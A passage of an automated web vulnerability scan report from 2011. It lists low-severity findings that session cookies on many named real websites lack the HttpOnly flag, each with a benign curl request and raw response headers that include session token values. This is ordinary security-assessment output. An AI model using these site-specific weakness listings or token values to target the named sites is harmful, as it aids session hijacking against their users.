X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:43:25 GMT


14.8. http://www.evite.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.evite.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.evite.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Vary: User-Agent
Expires: Sat, 02 Apr 2011 12:43:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 12:43:20 GMT
Content-Length: 4414
Connection: close
Set-Cookie: evsessionid=66.235.125.15.1301748200628547; path=/; domain=.evite.com


<!-- -->


<html>
<head>
<title>Evite</title>
<style type="text/css">@import url(http://cdn.evite.com/html/css/wizard_ie.css?ver=);</style>
<link rel="stylesheet" type="t
...[SNIP]...

14.9. http://www.freeridegames.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.freeridegames.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.freeridegames.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:08 GMT
Server: Apache
Set-Cookie: JSESSIONID=454706C5579DD4BBE9DEF3994E49D6C7; Path=/
Set-Cookie: 143_userName=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: 143_password=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: 143_TURNKEY=Default-551301751188525286; Expires=Sun, 01-Apr-2012 13:33:08 GMT; Path=/
Set-Cookie: 143_CAMPAIGN_SERIAL_ID=Default-Default; Expires=Fri, 01-Jul-2011 13:33:08 GMT; Path=/
Set-Cookie: 143_FIRST_BROWSER="Default-MSIE 7.0"; Version=1; Max-Age=7776000; Expires=Fri, 01-Jul-2011 13:33:08 GMT; Path=/
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Accept-Ranges: bytes
ETag: W/"60157-1301309068734"
Last-Modified: Mon, 28 Mar 2011 10:44:28 GMT
Content-Length: 60157
Content-Type: text/html

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Games - D
...[SNIP]...

14.10. http://www.genealogy.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.genealogy.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.genealogy.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:17:39 GMT
Server: Apache
Set-Cookie: SessionID=991df4142c2bdfff4d973003; path=/; domain=.genealogy.com; expires=Friday, 31-Dec-2010 23:59:59 GMT
Set-Cookie: GComStoreData=%0ASIT%3D001f39142c56ebff4d973003; domain=.genealogy.com; path=/;
X-ServerName: SN:gweb07:
Last-Modified: Thu, 03 May 2007 15:39:07 GMT
ETag: "297817-e36-463a021b"
Accept-Ranges: bytes
Content-Length: 3638
Connection: close
Content-Type: text/plain
Set-Cookie: BIGipServerwww.genealogy.com=119122112.20480.0000; path=/

...[SNIP]...

14.11. http://www.gofreecredit.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.gofreecredit.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gofreecredit.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.54
Date: Sat, 02 Apr 2011 13:35:23 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.4
Set-Cookie: PHPSESSID=4pqo3dq4ottaqjnelc03n7u4c0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status404: File not found
Set-Cookie: uid=ChViBk2XJhuPAz5VA1tVAg==; expires=Sun, 01-Apr-12 13:35:23 GMT; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: uid=0CuC3E2XJhtzRyLkA2FQAg==; expires=Sun, 01-Apr-12 13:35:23 GMT; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 340

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" conte
...[SNIP]...

14.12. http://www.hayneedle.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.hayneedle.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hayneedle.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 No Content
Date: Sat, 02 Apr 2011 14:13:19 GMT
Server: Apache
Set-Cookie: SITE_ID=669;domain=.hayneedle.com;path=/
Set-Cookie: GLOBALBRANDTABDISPLAYFLAG=1;domain=.hayneedle.com;expires=Mon, 25-Mar-2041 14:13:19 GMT;path=/
Set-Cookie: CFID=1845783;expires=Mon, 25-Mar-2041 14:13:19 GMT;path=/
Set-Cookie: CFTOKEN=18555418;expires=Mon, 25-Mar-2041 14:13:19 GMT;path=/
Set-Cookie: SID=168F9556%2DAFAA%2DD69D%2DBF662349017993E3;domain=.hayneedle.com;path=/
Set-Cookie: BRAND_SID=168F9564%2DBCFC%2D2008%2DF545EEB98C2F515F;domain=.hayneedle.com;path=/
Set-Cookie: GLOBAL_SID=168F9572%2DFF8F%2D4773%2D011E87EA6323CAED;domain=.hayneedle.com;expires=Mon, 25-Mar-2041 14:13:19 GMT;path=/
Set-Cookie: SITE_ID=669;path=/
Set-Cookie: GEO_DATA=%3CwddxPacket%20version%3D%271%2E0%27%3E%3Cheader%2F%3E%3Cdata%3E%3Cstruct%3E%3Cvar%20name%3D%27POSTAL%5FCODE%27%3E%3Cstring%3E05672%3C%2Fstring%3E%3C%2Fvar%3E%3C%2Fstruct%3E%3C%2Fdata%3E%3C%2FwddxPacket%3E;path=/
Set-Cookie: SURVEYS=309%7C%7Bts%20%272011%2D04%2D02%2009%3A13%3A19%27%7D%7C0%7C0;expires=Mon, 25-Mar-2041 14:13:19 GMT;path=/
Set-Cookie: SESSION_COUNTER=4310204;path=/
Set-Cookie: SIGNATURE=MWP5GCRJ3nTSpdoEL7gF10r6POmFuHsBTEquPge%2BNls2sE5V2f2bPn6ywNvybK6A;domain=.hayneedle.com;path=/
Set-Cookie: GLOBAL_CUSTOMER_ACCOUNT=%3CwddxPacket%20version%3D%271%2E0%27%3E%3Cheader%2F%3E%3Cdata%3E%3Cstruct%3E%3Cvar%20name%3D%27CUSTOMER%5FID%27%3E%3Cstring%3E0%3C%2Fstring%3E%3C%2Fvar%3E%3Cvar%20name%3D%27CUSTOMER%5FFIRST%5FNAME%27%3E%3Cstring%3E%3C%2Fstring%3E%3C%2Fvar%3E%3Cvar%20name%3D%27SIGNED%5FIN%27%3E%3Cstring%3E%3C%2Fstring%3E%3C%2Fvar%3E%3C%2Fstruct%3E%3C%2Fdata%3E%3C%2FwddxPacket%3E;domain=.hayneedle.com;path=/
Set-Cookie: SKU_COMPARE=;domain=.hayneedle.com;expires=Mon, 25-Mar-2041 14:13:19 GMT;path=/
Set-Cookie: INITIAL_SESSION_LOGGED=1;domain=.hayneedle.com;path=/
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 22867

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
...[SNIP]...

14.13. http://www.kaboodle.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.kaboodle.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kaboodle.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ss=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ss=""; Path=/
Set-Cookie: JSESSIONID=CD6A173FEB5068E709E2FABC3BE58FCC; Path=/
Set-Cookie: ss=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ss=""; Path=/
Expires: Sat, 09 Jul 2011 23:30:33 GMT
Cache-Control: max-age=8640000
ETag: W/"16958-1301007108000"
Last-Modified: Thu, 24 Mar 2011 22:51:48 GMT
Content-Type: image/x-icon;charset=UTF-8
Content-Language: en-US
Content-Length: 16958
Date: Sat, 02 Apr 2011 13:30:54 GMT

......@@.... .(B......(...@......... .......................................................R..........................................................................................................
...[SNIP]...

14.14. http://www.livevideo.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.livevideo.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.livevideo.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 503 Service Temporarily Unavailable
Date: Sat, 02 Apr 2011 14:04:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=q58e2q8qs5alfuj8eu827ing04; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 503 Service Temporarily Unavailable
Retry-After: 7200
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25139


<font face=arial size=2>
<table border=0 cellspacing=0 cellpadding=0 width=750 align=center><tr><td>
<center><br><img src="/live-video.gif"><br><br>

<table border=0 cellspacing=0 cellpadding=20 widt
...[SNIP]...

14.15. http://www.lowermybills.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.lowermybills.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lowermybills.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:58 GMT
Server: Apache
Set-Cookie: SERVER_COOKIE=173.193.214.243.1301751118181699; path=/; expires=Mon, 01-Apr-13 13:31:58 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Set-Cookie: JSESSIONID=FAF1E3B29C91E2801A839A985201BC0F; Path=/
ETag: W/"1718-1301524843000"
Last-Modified: Wed, 30 Mar 2011 22:40:43 GMT
Content-Length: 1718
Content-Type: image/x-icon
Set-Cookie: BIGipServerpl.lmbprod=553918474.20480.0000; path=/

..............(...&...........h...N...(....... ................................................................................................"""""" '......r/......./....././...."./....#.2/..."7."/.
...[SNIP]...

14.16. http://www.lyrics.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.lyrics.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lyrics.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Found
Date: Sat, 02 Apr 2011 13:50:27 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=fje8lglg3q0b5svml55m2bm093; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22e222da316628da66fe8b4cbb3db9d0a7%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22curl%2F7.21.0+%28amd64-pc-win32%29+libcurl%2F7.21.0+OpenSS%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1301752227%3B%7Ddd43b442b56ab4c5e5cf1d43e467e42a; expires=Sat, 02-Apr-2011 15:50:27 GMT; path=/
Location: http://www.lyrics.com/
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Set-Cookie: session_id=218759434.20480.0000; path=/


14.17. http://www.mapquest.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mapquest.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mapquest.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: t_Id=ZGVmYXVsdDpudWxs; Path=/
Set-Cookie: tsession="JLUHhthGQfnS1TgXuuJQmiORiO8="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Sat, 02-Apr-2011 13:07:30 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Sat, 02-Apr-2011 12:52:30 GMT; Path=/
Set-Cookie: psession="UdOt/zUW/PqyIT51eoLXfzOifpQ="; Version=1; Domain=mapquest.com; Max-Age=7776000; Expires=Fri, 01-Jul-2011 12:37:30 GMT; Path=/
Set-Cookie: c_Id=MjMzOjM5Mw%3D%3D; Expires=Sat, 02-Apr-2011 13:07:30 GMT; Path=/
Accept-Ranges: bytes
ETag: W/"1150-1301684392000"
Last-Modified: Fri, 01 Apr 2011 18:59:52 GMT
Content-Type: image/x-icon
Content-Length: 1150
Date: Sat, 02 Apr 2011 12:37:30 GMT

............ .h.......(....... ..... .............................?...?...?...?...?...?...?...?...?...?...?...?...?...?.......?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?...?.
...[SNIP]...

14.18. http://www.mayoclinic.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mayoclinic.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mayoclinic.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 file not found
Connection: close
Date: Sat, 02 Apr 2011 13:24:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=5216401;domain=.mayoclinic.com;expires=Mon, 25-Mar-2041 13:24:13 GMT;path=/
Set-Cookie: CFTOKEN=31014280;domain=.mayoclinic.com;expires=Mon, 25-Mar-2041 13:24:13 GMT;path=/
Set-Cookie: JSESSIONID=b230124a654d7a3c162276d7e9525c59751d;path=/
Set-Cookie: CURRENTFARCRYPROJECT=dotcom;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>

   <title>Page not found - MayoClinic.com</title>
   <meta name="description" conten
...[SNIP]...

14.19. http://www.medicinenet.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.medicinenet.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.medicinenet.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Location: /images/fav/mn.ico
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDACQTQCAC=GGLFPLPCCDPBLPPOFKPMKAKH; path=/
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:24:22 GMT


14.20. http://www.mrmovietimes.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mrmovietimes.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mrmovietimes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:00:53 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch13 mod_ssl/2.2.3 OpenSSL/0.9.8c
X-Powered-By: PHP/5.2.0-8+etch13
Set-Cookie: ci_session=Pxo%2Fmkc72zw34uGdKefBnTKWnI38vNFuRHZJuWHotgoLiVrWO%2FyS899sVleGDTCa2378J5LwcCx%2FaM3Iu6M9HYM1xNRYhzFD8lxZ46O%2FJ3nwd%2Bvpqrqxx8ftRXSPpmIZDPqJkuft4RfzDbKrA3W82BkFflF8ybcM%2FTTixeL%2Fm%2BrTiDc1eW64DbHWf7ZnUmfNoFYMH%2BNTVkfhzkAj2mnYk68GgXolGs5rItNsbvL1XJxkWq%2FGEKnjXX56nfFb6lHe9BXx0QjVxoyJwfdyq3S0xD7ZfsUzCE4qQl274NwudSsM4sTm5AG5seWG0rEVYqrOX%2BCvbs2RFaiYsOIBYd2tnOcF97iCBmuNqYstGLS9GEo40ZwueXnzLFJSNDQcN3ISMGspPD5cP4Kfiwg7241ktJS%2FoTY4QjL2IHI7fkO0V%2BwELgecc8ERNofDzFzXSuRysvQFytx2y9uu%2BDIejUxyv%2FE6%2B2F4WOFRzPCZHSAXt%2B63j%2FCewbA0HsBZEss7%2F6Xa1IUqt2VF7NLwawkOAm3xJ4j1%2FQPUWHVYJBcl%2BNiisNRgBE%2FLifcI4vGUK6XJbMHrKlkEqCc0Zl%2BJhc1sxp%2FFyKjXbYkb9chz3mP7lmJZHvX8ocsN%2F7Bxrkppf9uyWGrz; expires=Mon, 01-Apr-2013 14:00:53 GMT; path=/
Set-Cookie: locationData=O%3A8%3A%22stdClass%22%3A7%3A%7Bs%3A8%3A%22distance%22%3Bs%3A2%3A%2210%22%3Bs%3A4%3A%22city%22%3BN%3Bs%3A6%3A%22region%22%3BN%3Bs%3A12%3A%22country_code%22%3Bs%3A2%3A%22US%22%3Bs%3A8%3A%22latitude%22%3BN%3Bs%3A9%3A%22longitude%22%3BN%3Bs%3A11%3A%22postal_code%22%3Bs%3A0%3A%22%22%3B%7D; expires=Tue, 30-Mar-2021 14:00:53 GMT; path=/; domain=www.mrmovietimes.com
Set-Cookie: ci_session=BzKboyaJvMSktBeg3pLApmo%2BFi1zrsIVFwSxCPNsxsvMPhZVvVzgu9X6lsdhW6alBUOEFALoOzSWv1gnDLoPPwFI8HHbpddijnLl0f9V1hlJB8y3IxU21tCjPeSPQG4tJ0glFKgdxfty3Sw%2BTMl07BrDpKmlRLjs1cUDtYV%2Bec5pujiLNDKpgdo%2BfD2U2gAxqEntoeEWVNmKXJTJMkeTMjPmZEb7Cw0YHMzACi%2BEZWp7TeahJchMLtAUWr%2BKXhf%2BtfUPpz1Zl%2BvAiNYrsUsMQ1EZHpnW%2BAxq%2BiKZrw7W6014Qrk3yEakON6A445N3w%2FjQNi%2Bbml48X%2B9qkmm1vxaP7pUVZvbL1IUxldnQeCL7CNQqnTyo%2FTCzfnwzEMxkdeK85JfLbLluvLqfhB%2BhLSwhGjVuEMU1KteyLvEmkqPno%2Fht0BU%2FMBs3lVRhJIY5ac2N97zssEY8yACf1CangjgtXAa2KJxkoMFNA079kwj6cJYhCno20FBv8NJ2tdQu36LPzEO1Ye3WsfXedxcQrqIJV6JDwo%2FdsGpuRlqivbBcNLy3tqknO6QATPXaUddfy1calDlp4VxbPYokP0tqreyJiqpDZYuB6Wucxq02VGZKUz2k%2B4e5w2oIZMZxtGt%2B6lpV4OXoVCifK9YpMBxZi0fYe8kIjqT%2B0LFHAr8lxofuhJGCYVDne7%2FrH908Z5Zt%2FeNetYGgoWgTeZlX9d8QPfFwIl99hPNAFlJono6Rio3H4Bi%2FcoKpFcI7foxh4o%2B5Wd2WYvc%2Bfnnhy9cptgpTSQKztlFTaxP%2FREWWwmdhUEijT0JtxX7UrQMKXwG2k3LhiZTgTH6bNpVpkqSSFK3Og1NA2pDRoDXMhTdFsLIj08ox%2BXj88zSIhMZ5fWKKoPH%2FyqWPJlJyugj3x54W3ptgasZZB7ZdGnVfuakUJnYGKrXlTYLkF5suXHLaKMqXqvdzQwH8xMwhxSVIVhkHodESV0ZyGWaWTrrCtyNp2TvVeJXZdQt8J8Noyf4ZnaYHXAqBtAHF%2Fj2U0RwwfkHcUu3M85m6sWhfp4XNaFIZ6Qz%2Fg1Ij%2BRj9bdLXlnzV4u7EZgiVRDWMKGZdW5DbqbcuP4E7LNoRUzrVMKfwDc%2FU6KJLb3C8FI4ssXohIT4LUHPb7xEE9bS; expires=Mon, 01-Apr-2013 14:00:53 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10698

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

...[SNIP]...

14.21. http://www.musiciansfriend.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.musiciansfriend.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.musiciansfriend.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server:
Last-Modified: Fri, 15 Jan 2010 23:11:32 GMT
Accept-Ranges: bytes
Content-Length: 1406
X-Cnection: close
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=269732
Expires: Tue, 05 Apr 2011 16:35:34 GMT
Date: Sat, 02 Apr 2011 13:40:02 GMT
Connection: close
Set-Cookie: AKA-SESSION=35ce8f185c5000003227974d69c20a00849f0000; path=/; domain=musiciansfriend.com
Set-Cookie: OMTR-AKAID=35ce8f185c5000003227974d69c20a00859f0000; expires=Sun, 06-Mar-2016 13:40:02 GMT; path=/; domain=musiciansfriend.com
Set-Cookie: AKA-SESSION-5D=35ce8f185c5000003227974d69c20a00869f0000; expires=Thu, 07-Apr-2011 13:40:02 GMT; path=/; domain=musiciansfriend.com

..............h.......(....... ...................................T...W.....W."?x.....;...p...[}..;.......0i..^...cf..S...-W...7o.AV....V.y...6As.8q...9r.,^..........X...?Fv.,O..Z...\...3q..m...Y.....
...[SNIP]...

14.22. http://www.ncnetwork.net/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.ncnetwork.net
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ncnetwork.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 3482
Content-Type: text/html
Cache-Control: private
Date: Sat, 02 Apr 2011 13:51:31 GMT
Connection: close
Set-Cookie: ASPSESSIONIDCSRQABAS=GKFAHGGDKFNDLNDPCGJKGAAA; path=/
Set-Cookie: NSC_xxxod_tqmbu_mcw=ffffffff934e331545525d5f4f58455e445a4a423660;path=/

<!-- Vignette V6 Fri Dec 08 08:18:42 2006 -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Verizon</title>
<meta http-equiv="content-type" content="text/ht
...[SNIP]...

14.23. http://www.ning.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.ning.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ning.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
X-XN-Trace-Token: 9f9c1c9c-5fa1-4bab-8993-14577ccb4134
Server: Ning HTTP Server 2.0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: xn_visitor=c5369740-b729-45ac-ba3a-bbb4c515e644;Path=/;Domain=.ning.com;Expires=Tue, 30-Mar-21 13:24:47 GMT
Set-Cookie: ning_session="nAHWdTfdOjMut3QNynKqxXypQ/m+CjPKz2Xk0bPPyn9b46CDeXF+vx+gkz8Znwi2UfKCwpXcPW8=";Path=/;Domain=ning.com;Expires=Sat, 02-Apr-11 14:24:47 GMT
XN-ResponseFrom: 10.16.33.64,(10.16.106.52,200,6)
Date: Sat, 02 Apr 2011 13:24:47 GMT
Last-Modified: Thu, 31 Mar 2011 23:15:59 GMT
ETag: "408973-57e-49fcf79e5e9c0"
Accept-Ranges: bytes
Content-Type: image/x-icon
Cache-Control: max-age=0
Content-Length: 1406

..............h.......(....... ...............................~...O.~.........[...C.u.....................r.............................................................................................
...[SNIP]...

14.24. http://www.popularscreensavers.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.popularscreensavers.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.popularscreensavers.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
